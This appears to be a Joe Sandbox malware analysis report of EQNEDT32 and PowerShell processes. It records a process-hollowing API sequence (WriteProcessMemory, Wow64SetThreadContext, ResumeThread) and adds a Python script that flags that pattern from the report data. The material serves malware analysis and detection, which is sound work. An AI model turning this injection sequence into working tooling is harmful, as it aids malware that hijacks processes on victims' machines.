                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction ID: 31935c686bbd29ea3a2b2c1d424b34c0833b4a75fefbbe0736832c10d252e498
                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction Fuzzy Hash: 0C01FCD89B43C2DADF30EAE8E8057B79A15BB8170CFCC484E6482060F2C558D1C3C5AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction ID: 1b0442398455fafcea5991eea541727e4141752239473bd984aaa889ed0a2f04
                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction Fuzzy Hash: 53014C949B83C1EED620E6E4EC48BAAA950B7C170CF94440EA051070F2C284C5C3C15D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(035C04AB,?,035C0428,?,035C040C,?,035C03F2), ref: 035C04B9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4836450b0cce7124105711d503be094eb3d73dd1ce2c3e5e680bc1076ba61889
                                                        • Instruction ID: 66cfcd8f5392b9c317d532e985eae8aff97ee2fd53533f14934d3765d3cbd145
                                                        • Opcode Fuzzy Hash: 4836450b0cce7124105711d503be094eb3d73dd1ce2c3e5e680bc1076ba61889
                                                        • Instruction Fuzzy Hash: 9F21CED684C7C25FC71387706D3E611BF642A67008B5D86CFD4C60A9E3E7989212D793
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                        • Instruction ID: 1f210fd44b163ef0e54a8dfdf15368c0c89f3aeedef8251ada056b9ccf7922e0
                                                        • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                        • Instruction Fuzzy Hash: 0CD017B1212642DFD204EB64DD80F27F77AFFC8621F14C268E5054B6AAC730E891CAE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.544968912.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c182e058e5ea8432d8b65bf0c6f0bd64bfcad85698e7d0aa14ff58db9fc83aa
                                                        • Instruction ID: 9046aba9fee548deda03ea74c90330a253c9303eb41b5a0d1c87c7bf96c6b285
                                                        • Opcode Fuzzy Hash: 7c182e058e5ea8432d8b65bf0c6f0bd64bfcad85698e7d0aa14ff58db9fc83aa
                                                        • Instruction Fuzzy Hash: 86018471504340AAEB105E25EC84B66BFD8EF41724F2C855AFC494B286C7799845C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.544968912.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7567bc44253df3c37ef2c6a3dcc30725b1d0073b655278a7356f1557e09f62f9
                                                        • Instruction ID: 10b9f03be4f507ad20b6f7a2af51832d84f789c51ecd2a12139e41022f7ce0d3
                                                        • Opcode Fuzzy Hash: 7567bc44253df3c37ef2c6a3dcc30725b1d0073b655278a7356f1557e09f62f9
                                                        • Instruction Fuzzy Hash: 22F06271404344AFEB108A16DCC4B66FFD8EB41724F18C55AED484E286C3799C45CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:6.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.7%
                                                        Total number of Nodes:24
                                                        Total number of Limit Nodes:2

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ($()j
                                                        • API String ID: 0-3351030596
                                                        • Opcode ID: 4cd68e7ee888f5c9fd0c1187bed7f6b77d7b5688fed8213864708d31444a1067
                                                        • Instruction ID: a3c68d0f7577ce5f24681bf8277d1a90e097ca1de94f7add5ba83bd63af8ca8f
                                                        • Opcode Fuzzy Hash: 4cd68e7ee888f5c9fd0c1187bed7f6b77d7b5688fed8213864708d31444a1067
                                                        • Instruction Fuzzy Hash: 3562C074A10229CFDB69DF68C894BEDB7B2BB89304F1481EAD40DA7295DB305E85CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PB-
                                                        • API String ID: 0-342722128
                                                        • Opcode ID: e023ec6337baeb71e0af124e21fa968338384f3dd76d10911bcadbda76d57cb9
                                                        • Instruction ID: d7c2dfb49d5ce65c52e65d62f653aa154ba9c44ef0bd0de653196747762fc7f2
                                                        • Opcode Fuzzy Hash: e023ec6337baeb71e0af124e21fa968338384f3dd76d10911bcadbda76d57cb9
                                                        • Instruction Fuzzy Hash: 49614B71E062698FDB65CF29D8507DDBBB2BF8A300F0481EAD448A7261DB304D81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$@=4$@=4$@=4$tPp$tPp$tPp$tPp$$p$$p$$p$$p$$p$$p$[i$[i
                                                        • API String ID: 0-3621546577
                                                        • Opcode ID: a47a71656f405eaa7dfbe2f58e840588a96433d7a9fe2d9350a668a1a1a5c751
                                                        • Instruction ID: 76c0615597af60208acb42f5b394de498fe46d9e8c925ec76e44de958f10f30e
                                                        • Opcode Fuzzy Hash: a47a71656f405eaa7dfbe2f58e840588a96433d7a9fe2d9350a668a1a1a5c751
                                                        • Instruction Fuzzy Hash: 4A024A35B043009FDB248B68D9607BABFE6AFC5320FA8846AD445CB395DE71DD41C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$D<4$D<4$D<4$D<4$h<4$h<4$$p$$p$$p
                                                        • API String ID: 0-787553010
                                                        • Opcode ID: 83e4d2732bd89ca961f9f0305a4e7b4c02da3fcff2653bfe807237a6234b7c6c
                                                        • Instruction ID: e7947e7e00182f332c57ee4f5fa9aec57d10354dcf8f1d60546b405e73b738ae
                                                        • Opcode Fuzzy Hash: 83e4d2732bd89ca961f9f0305a4e7b4c02da3fcff2653bfe807237a6234b7c6c
                                                        • Instruction Fuzzy Hash: 2C914634704301AFDB285A7C8A607BF7BE69FC5320FA4842AD946CB291DE75DD82C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: 09a0f9e92248aad7c3e8ab4a1d1f3daed3e7b0213ea70483a6e2b543073b4f4a
                                                        • Instruction ID: 286206734f92cc7a7f4ecac88bd6b1dad0b3a1d43572ebeb3c8164fb51800cab
                                                        • Opcode Fuzzy Hash: 09a0f9e92248aad7c3e8ab4a1d1f3daed3e7b0213ea70483a6e2b543073b4f4a
                                                        • Instruction Fuzzy Hash: A041F630B00204DFCB14CE54D674BEAB7E6AF88720F99C0A9E4049B395CB71ED40CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: bcf60c381628c8cb96adbfb591ba81350051054debfcb414af01707b036dfc2e
                                                        • Instruction ID: 11a98ae4fef086bf21f1b54c1b187f6b6403d5861d37e13adfbffb506ebc224f
                                                        • Opcode Fuzzy Hash: bcf60c381628c8cb96adbfb591ba81350051054debfcb414af01707b036dfc2e
                                                        • Instruction Fuzzy Hash: 9C41D334B01200DFDB14CE58D674BEAB7E6AF88720FA9C4A9D4059B394CB71DD41CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$@=4$@=4$tPp
                                                        • API String ID: 0-325221203
                                                        • Opcode ID: e173e10e35b7a6bbc19d9d68077556d0be52e5aec6c1189041583ea6bf995657
                                                        • Instruction ID: 9635d5bc4ea0b9509e3e60760fa77842558fac28e7cd178970f612e76f1a7ec2
                                                        • Opcode Fuzzy Hash: e173e10e35b7a6bbc19d9d68077556d0be52e5aec6c1189041583ea6bf995657
                                                        • Instruction Fuzzy Hash: E441D630B01204DFDB14DE59D674BEAB7EAAF88720F99C0A9D4059B354CB71DD40CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $&,$$&,$(op$(op
                                                        • API String ID: 0-760950474
                                                        • Opcode ID: d6f046c49d7efae441daa3bc1ccde922950716d35a7d28e8a24730aaf453e728
                                                        • Instruction ID: 00481f3c32ccea609b1ee45b95af9b22208b811a6eca255f671ca95d88a77e9f
                                                        • Opcode Fuzzy Hash: d6f046c49d7efae441daa3bc1ccde922950716d35a7d28e8a24730aaf453e728
                                                        • Instruction Fuzzy Hash: 20312A317002099FCF158F68C915BEEBB92EB85331F2488AAE9518B2D4CB75C851CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$D<4$D<4$$p
                                                        • API String ID: 0-584163927
                                                        • Opcode ID: 11afa5e776c78cd1d2569d845e18e9ac55543383c02a10427021061325fa8da9
                                                        • Instruction ID: 1f4cbfdbdf324644de8940a74fa800560300db08189744f4a12451f09d6716ca
                                                        • Opcode Fuzzy Hash: 11afa5e776c78cd1d2569d845e18e9ac55543383c02a10427021061325fa8da9
                                                        • Instruction Fuzzy Hash: 2A014E34B04100EBDF15A358D5206BEB752DB88B10F70802AD905EB161CB36DD46DB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p
                                                        • API String ID: 0-3973980265
                                                        • Opcode ID: d9fcb3739453ba7c982858bb43d9bc57698b6095fd2591d339b14ac2979fe9b5
                                                        • Instruction ID: 147ca6d9bb2ee562412c9187020c7ca0d1abc97c11567b93b59d531aff4da27a
                                                        • Opcode Fuzzy Hash: d9fcb3739453ba7c982858bb43d9bc57698b6095fd2591d339b14ac2979fe9b5
                                                        • Instruction Fuzzy Hash: 88E0D8317043449ACB19676495613EC7BA1EFD2270F6484DFC48086255CE249D16C352
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00277557
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 0d1c437ff977cbbaead58acc08b3b7d6270a0923563f5ce2906c9dc0abde3bc7
                                                        • Instruction ID: 203920d3f2e079256ce9b20aea641487554e6bcaa88eeef3044465ecae04ab66
                                                        • Opcode Fuzzy Hash: 0d1c437ff977cbbaead58acc08b3b7d6270a0923563f5ce2906c9dc0abde3bc7
                                                        • Instruction Fuzzy Hash: EFC12870D1421A8FDF24CFA8C841BEDBBB1BF49300F0091AAD859B7254DB749A95CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00276FCB
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 2beecc33fd9cda78239a92cf22acbcabf0e0d357865c8b68c794bfb30982417b
                                                        • Instruction ID: c9b0cbdba03aa84f6e9a0868dd58461c5ab94c3aabdd11bb86dee6c710f8d698
                                                        • Opcode Fuzzy Hash: 2beecc33fd9cda78239a92cf22acbcabf0e0d357865c8b68c794bfb30982417b
                                                        • Instruction Fuzzy Hash: 6241CAB4D012499FCF00CFA9D984AEEFBF1BB49314F20942AE819B7250C334AA55CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00276D4F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 5c252ba6133d1e29c3c9fc0df4405e555abe4807205246990c8d6c0e69aafd5e
                                                        • Instruction ID: 6dc63295042e8e02d3a1f743c1036cf02ff94e9ad9e72e41655da585a012e878
                                                        • Opcode Fuzzy Hash: 5c252ba6133d1e29c3c9fc0df4405e555abe4807205246990c8d6c0e69aafd5e
                                                        • Instruction Fuzzy Hash: 7841DEB4D102589FCF10CFA9D984AEEFBB1AF48314F24802AE419B7250D738A949CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00276D4F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: daa66d4574c3eb44ecf61add671006a460b5dc0c9be693171bbf29e0196ed0ff
                                                        • Instruction ID: 1e25531edef40b0022b681dffde968232b6cff79411e77776dcffdefaf1f7d8e
                                                        • Opcode Fuzzy Hash: daa66d4574c3eb44ecf61add671006a460b5dc0c9be693171bbf29e0196ed0ff
                                                        • Instruction Fuzzy Hash: D741CBB4D102589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240D779A989CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                         Control-flow Graph (rendered as an image in the report; blocks and edges recovered from the graph data)
                                                         • Blocks: 276bb0-276c44 (calls ResumeThread); 276c46-276c4c; 276c4d-276c8f
                                                         • Edges: 276bb0 -> 276c46; 276bb0 -> 276c4d; 276c46 -> 276c4d
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: b2b1a6aea10b90dcfd8ab5b991137c7d8302543fe9cc52417ed2e74a35070904
                                                        • Instruction ID: defb630be2cdc387579a9ceda20af158e7a2eee9690b1cd86c981813bc3f80b4
                                                        • Opcode Fuzzy Hash: b2b1a6aea10b90dcfd8ab5b991137c7d8302543fe9cc52417ed2e74a35070904
                                                        • Instruction Fuzzy Hash: 9731DAB4D102089FCF10CFAAD984AAEFBB1EF49314F14842AE819B7300C735A905CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

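The two functions above sit in a region of the PowerShell process (process index 10, dump 2, base 0x270000) that the report marks "based on PE: false", and between them they call Wow64SetThreadContext and ResumeThread: the tail of a thread-hijack or process-hollowing sequence, where a suspended thread's context is overwritten and the thread is then resumed. The following script is an added example, not part of the Joe Sandbox report or its plugin: it parses the report's memory-dump source names and flattened control-flow-graph text and flags that pattern. The process index, dump index and base address fields of the .sdmp name are confirmed by the "hcaresult_10_2_270000" snapshot name and the "Offset:" value on the page; treating the fifth field as the page protection (0x40 = PAGE_EXECUTE_READWRITE) and the seventh as the allocation type (0x20000 = MEM_PRIVATE) is an assumption that merely fits the values shown. The sample input is constructed from the two entries reproduced above, and the API sets also cover the 64-bit and native variants (SetThreadContext, NtSetContextThread, NtResumeThread) that do not appear on this page.

```python
"""Parse Joe Sandbox .sdmp source names and flattened CFG text, flag the
'set thread context, then resume' injection tail. Added example; field
semantics of the .sdmp name beyond proc/dump/base are an ASSUMPTION."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Windows constants (winnt.h). Which .sdmp fields they are compared against
# is the assumption noted above; the values in this report fit it.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000

# <proc>.<dump>.<seq>.<base>.<f1>.<f2>.<f3>.<f4>.sdmp, e.g.
# 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<f1>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\."
    r"(?P<f3>[0-9A-Fa-f]{8})\.(?P<f4>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_LINE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),.*based on PE:\s*(?P<pe>true|false)", re.I
)


@dataclass
class DumpSource:
    process_index: int  # first field; matches hcaresult_10_... in the report
    dump_index: int     # second field
    base: int           # region base; matches the "Offset:" value
    protect: int        # ASSUMED: fifth field is the page protection
    mem_type: int       # ASSUMED: seventh field is the allocation type
    based_on_pe: bool   # taken from the "based on PE:" text


def parse_source_line(line: str) -> DumpSource:
    """Parse one '• Source File: <name>.sdmp, Offset: ..., based on PE: ...' line."""
    m = SOURCE_LINE_RE.search(line)
    if not m:
        raise ValueError("not a Source File line")
    f = SDMP_RE.fullmatch(m["name"])
    if not f:
        raise ValueError("unexpected .sdmp name layout")
    return DumpSource(int(f["proc"], 16), int(f["dump"], 16), int(f["base"], 16),
                      int(f["f1"], 16), int(f["f3"], 16), m["pe"].lower() == "true")


@dataclass
class Cfg:
    blocks: Dict[int, Tuple[int, int]] = field(default_factory=dict)  # id -> (start, end)
    apis: Dict[int, List[str]] = field(default_factory=dict)          # id -> APIs called
    edges: List[Tuple[int, int]] = field(default_factory=list)        # (from_id, to_id)


EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$", re.I)


def parse_cfg(text: str) -> Cfg:
    """Parse 'control_flow_graph <id> <start>-<end> [API ...] <a>-><b> ...'.
    A bare integer starts a block, a hex range gives its bounds, any other
    token is an API called from the current block, 'a->b' is an edge."""
    cfg = Cfg()
    cur = None
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    for tok in tokens:
        if (e := EDGE_RE.match(tok)):
            cfg.edges.append((int(e[1]), int(e[2])))
        elif (r := RANGE_RE.match(tok)) and cur is not None:
            cfg.blocks[cur] = (int(r[1], 16), int(r[2], 16))
        elif tok.isdigit():
            cur = int(tok)
            cfg.apis.setdefault(cur, [])
        elif cur is not None:
            cfg.apis[cur].append(tok)
    return cfg


# Co-occurrence of one API from each set in code living in a non-PE region
# is the classic "overwrite a suspended thread's context, then resume it".
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}


def injection_indicators(src: DumpSource, cfgs: List[Cfg]) -> List[str]:
    called: Set[str] = {a for c in cfgs for apis in c.apis.values() for a in apis}
    findings = []
    if (not src.based_on_pe and src.mem_type == MEM_PRIVATE
            and src.protect == PAGE_EXECUTE_READWRITE):
        findings.append(f"private RWX region at {src.base:#x} in process "
                        f"{src.process_index} holds code but no PE image")
    if called & CONTEXT_APIS and called & RESUME_APIS:
        findings.append("thread context overwritten and thread resumed: "
                        + ", ".join(sorted(called & (CONTEXT_APIS | RESUME_APIS))))
    return findings


# Constructed input: the source line and the two CFG dumps from this section.
SOURCE_LINE = ("• Source File: 0000000A.00000002.446125326.0000000000270000.00000040"
               ".00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false")
CFG_TEXTS = [
    "control_flow_graph 1075 276ca0-276d00 1077 276d17-276d65 Wow64SetThreadContext "
    "1075->1077 1078 276d02-276d14 1075->1078 1080 276d67-276d6d 1077->1080 "
    "1081 276d6e-276dba 1077->1081 1078->1077 1080->1081",
    "control_flow_graph 1086 276bb0-276c44 ResumeThread 1089 276c46-276c4c "
    "1086->1089 1090 276c4d-276c8f 1086->1090 1089->1090",
]


def analyse() -> List[str]:
    src = parse_source_line(SOURCE_LINE)
    return injection_indicators(src, [parse_cfg(t) for t in CFG_TEXTS])


if __name__ == "__main__":
    for finding in analyse():
        print(finding)
```

The first finding depends only on the region metadata and the second only on the API names, so either alone is weak evidence; an RWX private region is also what .NET's JIT hands out inside powershell.exe, and ResumeThread on its own is how any parent starts a child created with CREATE_SUSPENDED. Both together, in code that the disassembler could not attribute to a PE image, are what make this region worth carving and scanning.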
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446090575.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c03947c8b0ffc6a316d543a3d1bfc8d5afa22d914785123ed10549046e28e1fd
                                                        • Instruction ID: e93c1d0f2b750453490b071bbf88b58c90dcbdad35bbbcb66de5e9a429030e5a
                                                        • Opcode Fuzzy Hash: c03947c8b0ffc6a316d543a3d1bfc8d5afa22d914785123ed10549046e28e1fd
                                                        • Instruction Fuzzy Hash: F501A771504340AAEB104E15DC84B67BFD8EF41724F2CC51AFC494F286C779D845C6B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446090575.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1e3f072dd828ff2c8223d59318f9d372bed5e238574c6a10e67afd0e6575c4
                                                        • Instruction ID: 9a1081d619fc9d864fe99cf4e308816908f33a9ef1c4d8832f0f85b2e2f5dc50
                                                        • Opcode Fuzzy Hash: 1f1e3f072dd828ff2c8223d59318f9d372bed5e238574c6a10e67afd0e6575c4
                                                        • Instruction Fuzzy Hash: 55F04F71404244AEEB108A16DC84B66FB98EB81724F18C55AED484E296C3799C45CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ''$(:4$(:4$(:4$L4p$L4p$L4p$L4p$L4p$L4p$L:4$L:4$L:4
                                                        • API String ID: 0-3936058094
                                                        • Opcode ID: 0aa67a62442be8b5118d50332831f8d58c3e2bd75041d5e93e8db624dce0a6bb
                                                        • Instruction ID: 052592e0e23b2f623649e383e62424bdb40e8ab6e430b0941422574ff8060bb8
                                                        • Opcode Fuzzy Hash: 0aa67a62442be8b5118d50332831f8d58c3e2bd75041d5e93e8db624dce0a6bb
                                                        • Instruction Fuzzy Hash: 84E16634B00244EFDB258F28CA54BEF7BA6AFC4320F188466E9559B291DB70CD45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h%i$h%i$$p$$p$$p
